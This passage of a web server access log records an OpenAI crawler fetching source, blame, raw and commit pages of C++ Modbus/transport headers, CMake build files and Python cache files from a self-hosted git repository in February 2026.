+[17/Feb/2026:16:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11518] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12014] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10909] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:16:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11909] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" +[17/Feb/2026:16:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 16411] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 16378] [Gzip 9.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" +[17/Feb/2026:16:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13014] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" +[17/Feb/2026:16:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21358] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21354] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fkeys.json" [Client 74.7.227.38] [Length 23452] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:16:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10911] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 